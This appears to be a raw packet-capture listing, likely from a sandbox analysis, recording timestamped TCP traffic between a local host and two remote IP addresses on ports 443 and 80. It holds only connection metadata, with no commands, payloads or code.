Sep 9, 2024 17:49:11.406811953 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.406872988 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.406873941 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.406898022 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.406936884 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.407798052 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.407866001 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.407870054 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.407892942 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.407932043 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.408675909 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.408736944 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.408745050 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.408760071 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.408803940 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.408869028 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.408934116 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.408936024 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.408955097 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.408993006 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.409698963 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.409760952 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.409770966 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.409782887 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.409821033 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.410598040 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.410661936 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.410675049 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.410685062 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.410721064 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.411631107 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.411695957 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.411705017 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.411719084 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.411756039 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.412539005 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.412610054 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.412620068 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.412632942 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.412671089 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.412741899 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.412815094 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.412818909 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.412842035 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.412884951 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.413485050 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.413544893 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.413553953 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.413570881 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.413614035 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.414361000 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.414433956 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.414434910 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.414455891 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.414500952 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.415205956 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.415265083 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.415271997 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.415287971 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.415333986 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.416078091 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.416150093 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.416160107 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.416197062 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.416251898 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.416259050 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.416326046 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.416387081 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.416390896 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.416412115 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.416457891 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.462146044 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.462172985 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.462271929 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.462304115 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.462574005 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.462693930 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.462711096 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.462744951 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.462757111 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.462773085 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.462810040 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.479542971 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.479564905 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.479620934 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.479620934 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.479646921 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.479762077 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.480252028 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.480273962 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.480309010 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.480319977 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.480335951 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.480936050 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.480952978 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.480989933 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.480998993 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.481015921 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.481914997 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.481981039 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.481981039 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.482007027 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.482044935 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.482115984 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.482177973 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.482178926 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.482206106 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.482244015 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.482861996 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.482927084 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.482933044 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.482959032 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.483000040 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.554172039 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.554266930 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.554274082 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.554302931 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.554325104 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.554358006 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.554552078 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.554625034 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.554657936 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.554662943 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.554685116 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.554734945 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.567526102 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.567555904 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.567645073 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.567645073 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.567667007 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.568428040 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.568454027 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.568484068 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.568495989 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.568511009 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.569044113 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.569062948 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.569103956 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.569116116 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.569133997 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.570717096 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.570744038 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.570779085 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.570790052 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.570806026 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.571502924 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.571522951 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.571562052 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.571571112 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.571594000 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.572079897 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.572104931 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.572138071 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.572144985 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:11.572165012 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:11.774804115 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.616391897 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.616409063 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.616434097 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.616442919 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.616463900 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.616554022 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.616595984 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.616611958 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.616611958 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.616650105 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.617296934 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.617305994 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.617325068 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.617337942 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.617352009 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.617371082 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.617372036 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.617373943 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.617398977 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.617424011 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.617444038 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618019104 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618030071 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618056059 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618083954 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618103027 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618103027 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618120909 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618170977 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618632078 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618658066 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618707895 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618709087 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618719101 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618731976 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618760109 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618777990 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618792057 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.618819952 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.618839025 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.619720936 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.619744062 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.619790077 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.619811058 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.619834900 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.620599985 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.620628119 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.620671988 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.620672941 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.620682955 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.620704889 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.620738983 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.620783091 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.620783091 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.620796919 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.621540070 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.621568918 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.621606112 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.621624947 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.621653080 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.621653080 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.622394085 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.622420073 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.622572899 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.622572899 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.622590065 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.622941017 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.622967958 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.623008966 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.623028040 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.623050928 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.624162912 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.624185085 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.624227047 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.624243975 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.624268055 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.624268055 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.624497890 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.624526024 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.624569893 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.624569893 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.624584913 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.624617100 CEST  49168        443        192.168.2.22     207.241.227.96
Sep 9, 2024 17:49:12.625298977 CEST  443          49168      207.241.227.96   192.168.2.22
Sep 9, 2024 17:49:12.625322104 CEST  443          49168      207.241.227.96   192.168.2.22
                                              Sep 9, 2024 17:49:12.625360012 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.625376940 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625400066 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.625849009 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625875950 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625916004 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.625932932 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625956059 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.626384974 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.626414061 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.626466036 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.626466036 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.626481056 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.627931118 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.627957106 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628000021 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628007889 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628057957 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628057957 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628684998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628707886 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628757000 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628757000 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628763914 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629106998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629133940 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629159927 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629164934 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629174948 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629189968 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629442930 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629492998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629523993 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629529953 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629539967 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629949093 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629982948 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630004883 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630011082 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630022049 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630034924 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630880117 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630903006 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630930901 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630935907 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630945921 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630996943 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631026983 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631035089 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631040096 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631081104 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631124973 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631836891 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631864071 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631895065 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631900072 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631910086 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631934881 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631949902 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631953955 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631968975 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631980896 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632014036 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632019043 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632122040 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632831097 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632886887 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632894993 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632900000 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632939100 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632946014 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632963896 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.633006096 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.636142015 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.769052029 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:12.774326086 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:12.774405956 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:12.774596930 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:12.779618979 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417831898 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417851925 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417900085 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417957067 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417949915 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418055058 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418266058 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418289900 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418303013 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418329000 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418428898 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418442011 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418452978 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418469906 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418504000 CEST4916980192.168.2.22185.235.137.223
